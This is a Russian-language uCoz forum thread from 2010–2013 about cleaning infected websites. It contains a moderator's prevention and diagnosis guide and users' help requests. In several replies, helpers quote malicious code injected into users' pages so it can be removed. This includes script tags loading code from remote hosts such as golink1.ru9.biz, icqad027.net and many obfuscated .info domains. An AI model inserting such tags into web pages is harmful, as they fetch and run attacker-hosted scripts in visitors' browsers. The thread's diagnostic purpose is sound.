Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    dasha007
    Сообщений: 8
    Репутация: 0

    Сообщение # 391 | 19:03:49 29 Июл 2013
    Цитата (webanet)
    скорее всего да. удаляйте плееры ветерка
    Я писал ВЕТЕРКУ мне сказали что все почистили и ни каких вирусов больше нет, но скорее всего все так и осталось. Теперь нужно либо удалять все плеера ветерка или подождать недельки две пока яндекс все наладит и не будет считать ветерок вредоносным.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 392 | 19:06:05 29 Июл 2013
    dasha007,
    Цитата
    Теперь нужно либо удалять все плеера ветерка или подождать недельки две пока яндекс все наладит и не будет считать ветерок вредоносным.
    не знаю. это зависит от скорости решения проблем между ветерком и яндексом
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    LUK
    Сообщений: 5
    Репутация: 0

    Сообщение # 393 | 22:27:19 29 Июл 2013
    Здравствуйте. Подскажите пожалуйста.
    1) Сайт pervour.ru . Проблема в том, что при брождении по сайту, переходе на главную или любую другую страницу иногда открывается левое окно, другой сайт, предлагающее обновить браузер и т.д.
    2) Проблема обнаруживается и под гостем и под администратором.
    3) Антивируса нет, т.к. сижу на Линуксе, на виндах проверял - вирусов не было (антивирь AVAST).
    Администратор 1, админю только под Линуксом, наверное пароль украли. Сейчас пароль поменял от панели управления. Подскажите что делать, где можно искать фрейм или скрипт, можно ли как-нибудь отследить, что открывает новую вкладку с вредоносным сайтом? До этого ничего не делал, висел Адсенс, разных партнерок не ставил. Просто сайт работал и работал несколько лет, и вдруг бац, левые ссылки стали открываться.
    baracuda12
    Сообщений: 6
    Репутация: 0

    Сообщение # 394 | 00:43:59 30 Июл 2013
    Добрый день, проблема следующего характера:
    1. bestphone.at.ua - при переходе в мобильной версии браузера Андроид на сайт происходит непонятная переадресация на сайт для обновления браузера brusonline.net
    2. под гостем
    3. антивирус не реагирует
    4. блокируется только главная страница этим переходом

    Заранее благодарен за дельный ответ.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 395 | 00:47:25 30 Июл 2013
    baracuda12, панель управления- дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Код
    <script language="javascript" src="./js.php?s=43"></script><script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
    поле на что заменить оставляете пустым и производите замену во всех модулях

    после очистки меняете пароль uID профиля. инструкция по замене тут //forum.ucoz.ru/forum/45-52299-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    KOSS13
    Сообщений: 5
    Репутация: 0

    Сообщение # 396 | 01:13:15 30 Июл 2013
    Доброго времени суток Вам. Помогите найти причину блокировки ресурса яндексом. Одна из страниц на которую ссылается ПС http://zakacha.ru/load/prospekt_brazilii_vse_serii_2013_smotret_onlajn_11_12_serija/20-1-0-1110 (поведенческий анализ). Если это из за плеера ветерка, то не понятно, почему яндекс не блокирует у себя в выдаче сайт ветерок, а заблокировал сотни сайтов использующих их плеер? sad
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 397 | 01:20:02 30 Июл 2013
    KOSS13,
    Цитата
    Если это из за плеера ветерка, то не понятно, почему яндекс не блокирует у себя в выдаче сайт ветерок, а заблокировал сотни сайтов использующих их плеер?
    из-за ветерка. на сайте ветерка видео выводится чуть по-другому. а вот плеер состоит из ряда скриптов. и там вероятно было что-то внедрено
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    KOSS13
    Сообщений: 5
    Репутация: 0

    Сообщение # 398 | 01:53:42 30 Июл 2013
    Спасибо большое за ответ. Ещё вопрос. Пару месяцев назад, ресурс был заблокирован сайтом Вконтакте, по их утверждению, за присутствие вредоносного кода ведущего на разводняк сайт "Вконтакте, ваша страница заблокирована и тд..." Мы перепроверяли сайт со всех браузеров, разных регионов СНГ, но увидеть всплывающее окно так и не смогли, да и опрос постоянных пользователей не дал результатов, ни у кого разводняк не всплывал. Откуда ВК его видит не понятно. О партнёрках разводняках, мы прекрасно осведомлены и не используем на своём ресурсе. Пришлось сделать откат системы на год, удалили все партнёркии, очистили ресурс практически до стандартного шаблона. Дальнейшие переговоры по восстановлению доверия у ВК, перенесены на осень. Не могли бы Вы проверить сайт на наличие присутсвия постороннего кода, нервирующего ресурс Вконтакте?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 399 | 12:56:22 30 Июл 2013
    KOSS13,
    Цитата
    Не могли бы Вы проверить сайт на наличие присутсвия постороннего кода, нервирующего ресурс Вконтакте?
    есть у вас плеер нервирующий контакт
    вот он

    Код
    <iframe src="http://allserials.tv/getfile.php?file=Muhtesem.Yuzyil" width="700" height="600" frameborder="0" scrolling="no"></iframe>
    это ифрем от аллсериала. ифрейм содержит сам плеер и код рекламы. вскрываем ифрейм и видим.

    Цитата
    <html><head><title></title><style>*{margin:0;padding:0}</style></head><body><object id="videoplayer" тут кишки самого плеера упода</embed></object><script type="text/javascript" src="http://icqad027.net/check.php?user_id=005610&mode=vvk&domain=allserials.tv&block_id=9022&count=1"></script></body></html>


    выделенное красным и есть подгрузка той самой рекламы, которая бесит контакт и которая может тоже не понравится яндексу

    вывод. берем с опаской плееры с сервисов, раздаваемые ифреймами. печальная история с ветерком, неприятная история с аллсериалс и так далее

    ифремом можно ставить плееры, только из провернных источников. например ютуб. а не везде где раздают
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    масяня3411
    Сообщений: 3
    Репутация: 0

    Сообщение # 400 | 14:36:10 30 Июл 2013
    Цитата
    Я писал ВЕТЕРКУ мне сказали что все почистили
    dasha007 спасибо вам большое за помощь
    KOSS13
    Сообщений: 5
    Репутация: 0

    Сообщение # 401 | 14:52:52 30 Июл 2013
    Благодарю за ответ. Мы видели этот код у аллсериалс и о подгрузке рекламы знали, но в том то и дело, что при переписке с Вконтакте, они на скринах и проверке показывали совсем другие страницы, на которых присутствовали плеера только youtube или kset.kz, вот что нас удивило! Ещё раз спасибо за внимание.
    LUK
    Сообщений: 5
    Репутация: 0

    Сообщение # 402 | 18:16:55 30 Июл 2013
    А по моему сайту, не нашли ничего? cry
    Нашел у себя подозрительную ссылку в исходном коде страницы на [color=#efefef][/color] spotsniper.ru, это не ваше?
    Сообщение отредактировал LUK - Вторник, 30 Июл 2013, 18:21:01
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 403 | 23:05:36 30 Июл 2013
    LUK, я посетила все ваши страницы под российским ипом. не увидела я всплывающего левого

    Цитата
    2) Проблема обнаруживается и под гостем и под администратором.
    вы уверены, что и в залогиненом виде тоже?
    сделайте скрин левого окна когда всплывет. и адрес сайта, который открывается в новой вкладке дайте

    Цитата
    spotsniper.ru, это не ваше?
    наше. это адрес открутки стандартной рекламы юкоз
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    zuzikisa
    Сообщений: 26
    Репутация: 2

    Сообщение # 404 | 12:27:43 31 Июл 2013
    опять напускали вирусной рекламы на сайт....и не зайти в панель управления
    http://hrithikroshan-best.ru/
    Сообщение отредактировал zuzikisa - Среда, 31 Июл 2013, 12:29:07
    Деееенчик
    Сообщений: 190
    Репутация: 116

    Сообщение # 405 | 12:33:06 31 Июл 2013
    zuzikisa,
    Код
    <script src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt" type="text/javascript"><script src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt" type="text/javascript"><script src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt" type="text/javascript"><script src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt" type="text/javascript"><script src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt" type="text/javascript"><script src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt" type="text/javascript"><div id="utbr8214" rel="s6"></div><div id="wrap"><div><script src="http://fullhd.shivermaster.info/?720687=WxJbXQlNQ0BMREZLXBIbHxkfGA"><script src="http://fullhd.shivermaster.info/?729203=B04HAVURHxwQGBoXAE5HQ0VDSw"><script src="http://fullhd.shivermaster.info/?736521=fTR9ey9rZWZqYmBtejQ9OT85MA"><script src="http://fullhd.shivermaster.info/?744653=ufC5v-uvoaKupqSpvvD5_fv8_Q"><script src="http://fullhd.shivermaster.info/?752353=ldyVk8eDjY6CioiFktzV0dfQ0w"><script src="http://mobile.shivermaster.info/?823802=jseOiNyYlpWZkZOeicfOyszLyQ"><script src="http://mobile.shivermaster.info/?832415=66Lr7bn98_D89Pb77KKrr6muqw"><script src="http://bwekbcgqk.like-travel.info/?894830=GlMaHEgMAgENBQcKHVNdV1xYXg"><script src="http://bwekbcgqk.like-travel.info/?910745=7aTt67_79fb68vD96qSqoKuvqA"><script src="http://gfsmhk.bringtharacket.info/?3212=-LH4_qru4OPv5-Xo_7G_tb65tQ"><script src="http://gfsmhk.bringtharacket.info/?8228=UBlQVgJGSEtHT01AVxkVFBUWERY"><script src="http://gfsmhk.bringtharacket.info/?12655=G1IbHUkNAwAMBAYLHFJeX15dWlw"><script src="http://gfsmhk.bringtharacket.info/?16940=WBFYXgpOQENPR0VIXxEdHB0eGRg"><script src="http://gfsmhk.bringtharacket.info/?21375=C0ILDVkdExAcFBYbDEJOT05NSko"><script src="http://hbaapgv.like-travel.info/?317414=ktuSlMCEiomFjY-CldvV0dXU0Q"><script src="http://hbaapgv.like-travel.info/?324239=-7L7_ant4-Ds5Obr_LK8uLy9tw"><script src="http://rczzpgwjbeh.bringtharacket.info/?377651=Rw5HQRVRX1xQWFpXQA4ABAABBg"><script src="http://rczzpgwjbeh.bringtharacket.info/?383556=MHkwNmImKCsnLy0gN3l3c3d2cg"><script src="http://rczzpgwjbeh.bringtharacket.info/?388543=y4LLzZnd09Dc1NbbzIKOj46Niok"><script src="http://rczzpgwjbeh.bringtharacket.info/?393179=r-avqf25t7S4sLK_qObq6-rp7uw"><script src="http://rczzpgwjbeh.bringtharacket.info/?398265=zYTNy5_b1dba0tDdyoSIiYiLjIE"><script src="http://ardntueanhpr.with-some-spellings.info/?667368=nNWcms6KhIeLg4GMm9XZ2Nnf0Ng"><script src="http://ardntueanhpr.with-some-spellings.info/?671775=ayJrbTl9c3B8dHZ7bCIsKCcpLQ"><script src="http://ardntueanhpr.with-some-spellings.info/?675207=87rz9aHl6-jk7O7j9Lq0sL-xtA"><script src="http://ardntueanhpr.with-some-spellings.info/?679448=bCVsaj56dHd7c3F8ayUpKCopLi0"><script src="http://ardntueanhpr.with-some-spellings.info/?682933=wYjBx5PX2drW3tzRxoiEhYeEg4M"><script src="http://vzp.north-western.info/?688360=nNWcms6KhIeLg4GMm9Xb39De3A"><script src="http://vzp.north-western.info/?692761=bSRtaz97dXZ6cnB9aiQoKSsoLy4"><script src="http://rctssxvmfe.similarities-between.info/?987476=IGkgJnI2ODs3Pz0wJ2lnY2NnYw"><script src="http://rctssxvmfe.similarities-between.info/?992767=i8KLjdmdk5CclJabjMLOz83Oycc"><script src="http://rctssxvmfe.similarities-between.info/?996859=j8aPid2Zl5SYkJKfiMbKy8nKzcI"><script src="http://rctssxvmfe.similarities-between.info/?726=ouuipPC0urm1vb-ypevn5uTn4eY"><script src="http://rctssxvmfe.similarities-between.info/?4496=5K3k4rby_P_z-_n0462hoKKhp6E"><script src="http://whtcqx.north-western.info/?14160=JG0kInYyPD8zOzk0I21jZ2djaA"><script src="http://whtcqx.north-western.info/?18368=tP20suairK-jq6mks_3x8PLx9_I"><script src="http://xwbj.was-replaced.info/?398351=ezJ7fSltY2BsZGZrfDI-ODw-OQ"><script src="http://xwbj.was-replaced.info/?404984=jMWMit6alJebk5Gci8XJz8zIwA"><script src="http://xwbj.was-replaced.info/?409732=8Lnw9qLm6Ovn7-3g97m1s7C0vQ"><script src="http://xwbj.was-replaced.info/?414643=x47HwZXR39zQ2NrXwI6ChIeCgw"><script src="http://xwbj.was-replaced.info/?419390=SgNKTBhcUlFdVVdaTQMPDgwPCQ0"><script src="http://gjsijttzh.orientalwest.info/?427922=5q_m4LTw_v3x-fv24a-jpaGjpQ"><script src="http://gjsijttzh.orientalwest.info/?432135=czpzdSFla2hkbG5jdDo2MDQ2Pw">
    Это удалите с помощью быстрой замены
    Благодарности в репутацию и в награды!
    P.S Плюс под аватаркой)
    Сообщение отредактировал Деееенчик - Среда, 31 Июл 2013, 12:35:49
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск:
    Telegram
    Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!